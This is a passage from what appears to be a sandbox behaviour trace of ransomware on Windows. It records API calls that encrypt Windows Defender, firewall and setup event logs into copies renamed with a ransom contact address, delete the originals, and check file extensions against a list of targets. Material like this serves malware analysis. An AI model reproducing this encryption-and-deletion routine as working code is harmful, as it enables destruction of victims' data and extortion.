lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.855] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x13c, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x13c, lpOverlapped=0x0) returned 1 [0068.855] SetEndOfFile (hFile=0x394) returned 1 [0068.855] CloseHandle (hObject=0x394) returned 1 [0068.855] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.855] SetEndOfFile (hFile=0x2c8) returned 1 [0068.856] CloseHandle (hObject=0x2c8) returned 1 [0068.856] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.857] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx")) returned 1 [0068.857] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.857] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.857] lstrlenW (lpString=".doc") returned 4 [0068.857] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.857] lstrlenW (lpString=".docx") returned 5 [0068.857] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.857] lstrlenW (lpString=".pdf") returned 4 [0068.857] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.857] lstrlenW (lpString=".xls") returned 4 [0068.857] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.857] lstrlenW (lpString=".xlsx") returned 5 [0068.857] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.858] lstrlenW (lpString=".ppt") returned 4 [0068.858] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.858] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.858] lstrlenW (lpString=".zip") returned 4 [0068.858] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.858] lstrlenW (lpString=".rar") returned 4 [0068.858] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.858] lstrlenW (lpString=".bz2") returned 4 [0068.858] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.858] lstrlenW (lpString=".7z") returned 3 [0068.858] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.858] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.858] lstrlenW (lpString=".dbf") returned 4 [0068.858] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.858] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.858] lstrlenW (lpString=".1cd") returned 4 [0068.858] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.858] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.858] lstrlenW (lpString=".jpg") returned 4 [0068.858] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.858] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.858] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.858] lstrlenW (lpString=".doc") returned 4 [0068.858] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.858] lstrlenW (lpString=".docx") returned 5 [0068.858] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.858] lstrlenW (lpString=".pdf") returned 4 [0068.859] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.859] lstrlenW (lpString=".xls") returned 4 [0068.859] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.859] lstrlenW (lpString=".xlsx") returned 5 [0068.859] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.859] lstrlenW (lpString=".ppt") returned 4 [0068.859] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.859] lstrlenW (lpString=".zip") returned 4 [0068.859] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.859] lstrlenW (lpString=".rar") returned 4 [0068.859] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.859] lstrlenW (lpString=".bz2") returned 4 [0068.859] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.859] lstrlenW (lpString=".7z") returned 3 [0068.859] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.859] lstrlenW (lpString=".dbf") returned 4 [0068.859] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.859] lstrlenW (lpString=".1cd") returned 4 [0068.859] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0068.859] lstrlenW (lpString=".jpg") returned 4 [0068.859] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.859] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.860] lstrlenW (lpString="Microsoft-Windows-Windows Defender%4WHC.evtx") returned 44 [0068.860] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.860] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.860] CloseHandle (hObject=0x2c8) returned 1 [0068.860] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx")) returned 0x20 [0068.860] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.860] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.860] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.860] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.860] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0068.861] GetLastError () returned 0x0 [0068.861] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.863] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.866] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.866] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x12c, lpOverlapped=0x0) returned 1 [0068.866] SetEndOfFile (hFile=0x394) returned 1 [0068.867] CloseHandle (hObject=0x394) returned 1 [0068.867] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.867] SetEndOfFile (hFile=0x2c8) returned 1 [0068.868] CloseHandle (hObject=0x2c8) returned 1 [0068.868] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.868] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx")) returned 1 [0068.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.869] lstrlenW (lpString=".doc") returned 4 [0068.869] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.869] lstrlenW (lpString=".docx") returned 5 [0068.869] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.869] lstrlenW (lpString=".pdf") returned 4 [0068.869] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.869] lstrlenW (lpString=".xls") returned 4 [0068.869] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.869] lstrlenW (lpString=".xlsx") returned 5 [0068.869] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.869] lstrlenW (lpString=".ppt") returned 4 [0068.869] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.869] lstrlenW (lpString=".zip") returned 4 [0068.869] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.869] lstrlenW (lpString=".rar") returned 4 [0068.869] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.869] lstrlenW (lpString=".bz2") returned 4 [0068.869] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.869] lstrlenW (lpString=".7z") returned 3 [0068.869] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.869] lstrlenW (lpString=".dbf") returned 4 [0068.869] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.870] lstrlenW (lpString=".1cd") returned 4 [0068.870] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.870] lstrlenW (lpString=".jpg") returned 4 [0068.870] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.870] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.870] lstrlenW (lpString=".doc") returned 4 [0068.870] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString=".docx") returned 5 [0068.870] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.870] lstrlenW (lpString=".pdf") returned 4 [0068.870] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString=".xls") returned 4 [0068.870] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString=".xlsx") returned 5 [0068.870] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.870] lstrlenW (lpString=".ppt") returned 4 [0068.870] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.870] lstrlenW (lpString=".zip") returned 4 [0068.870] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString=".rar") returned 4 [0068.870] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString=".bz2") returned 4 [0068.870] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.870] lstrlenW (lpString=".7z") returned 3 [0068.871] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.871] lstrlenW (lpString=".dbf") returned 4 [0068.871] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.871] lstrlenW (lpString=".1cd") returned 4 [0068.871] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0068.871] lstrlenW (lpString=".jpg") returned 4 [0068.871] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.871] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.871] lstrlenW (lpString="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 82 [0068.871] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.872] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.872] CloseHandle (hObject=0x2c8) returned 1 [0068.872] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx")) returned 0x20 [0068.872] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.872] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.872] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.872] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.872] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0068.873] GetLastError () returned 0x0 [0068.873] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0069.499] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0069.500] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.500] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x178, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x178, lpOverlapped=0x0) returned 1 [0069.500] SetEndOfFile (hFile=0x394) returned 1 [0069.501] CloseHandle (hObject=0x394) returned 1 [0069.501] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.501] SetEndOfFile (hFile=0x2c8) returned 1 [0069.502] CloseHandle (hObject=0x2c8) returned 1 [0069.502] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0069.502] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx")) returned 1 [0069.502] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.502] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.502] lstrlenW (lpString=".doc") returned 4 [0069.502] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.502] lstrlenW (lpString=".docx") returned 5 [0069.502] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.502] lstrlenW (lpString=".pdf") returned 4 [0069.502] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.502] lstrlenW (lpString=".xls") returned 4 [0069.502] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.502] lstrlenW (lpString=".xlsx") returned 5 [0069.502] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.503] lstrlenW (lpString=".ppt") returned 4 [0069.503] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.503] lstrlenW (lpString=".zip") returned 4 [0069.503] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString=".rar") returned 4 [0069.503] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString=".bz2") returned 4 [0069.503] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString=".7z") returned 3 [0069.503] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.503] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.503] lstrlenW (lpString=".dbf") returned 4 [0069.503] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.503] lstrlenW (lpString=".1cd") returned 4 [0069.503] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.503] lstrlenW (lpString=".jpg") returned 4 [0069.503] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.503] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.503] lstrlenW (lpString=".doc") returned 4 [0069.503] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString=".docx") returned 5 [0069.503] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.503] lstrlenW (lpString=".pdf") returned 4 [0069.503] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString=".xls") returned 4 [0069.503] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString=".xlsx") returned 5 [0069.503] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.503] lstrlenW (lpString=".ppt") returned 4 [0069.503] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.503] lstrlenW (lpString=".zip") returned 4 [0069.503] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.503] lstrlenW (lpString=".rar") returned 4 [0069.504] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.504] lstrlenW (lpString=".bz2") returned 4 [0069.504] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.504] lstrlenW (lpString=".7z") returned 3 [0069.504] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.504] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.504] lstrlenW (lpString=".dbf") returned 4 [0069.504] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.504] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.504] lstrlenW (lpString=".1cd") returned 4 [0069.504] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.504] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0069.504] lstrlenW (lpString=".jpg") returned 4 [0069.504] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.504] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0069.504] lstrlenW (lpString="Setup.evtx") returned 10 [0069.504] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0069.504] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0069.504] CloseHandle (hObject=0x2c8) returned 1 [0069.504] GetFileAttributesW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx")) returned 0x20 [0069.504] GetFileAttributesW (lpFileName="C:\\Logs\\Setup.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\setup.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0069.505] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0069.505] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.505] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.505] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\setup.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0069.505] GetLastError () returned 0x0 [0069.505] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0069.508] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0069.509] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.509] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xe8, lpOverlapped=0x0) returned 1 [0069.509] SetEndOfFile (hFile=0x394) returned 1 [0069.509] CloseHandle (hObject=0x394) returned 1 [0069.509] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.509] SetEndOfFile (hFile=0x2c8) returned 1 [0069.510] CloseHandle (hObject=0x2c8) returned 1 [0069.510] SetFileAttributesW (lpFileName="C:\\Logs\\Setup.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0069.511] DeleteFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx")) returned 1 [0069.511] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.511] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.511] lstrlenW (lpString=".doc") returned 4 [0069.511] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.511] lstrlenW (lpString=".docx") returned 5 [0069.511] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.511] lstrlenW (lpString=".pdf") returned 4 [0069.511] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.511] lstrlenW (lpString=".xls") returned 4 [0069.511] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.511] lstrlenW 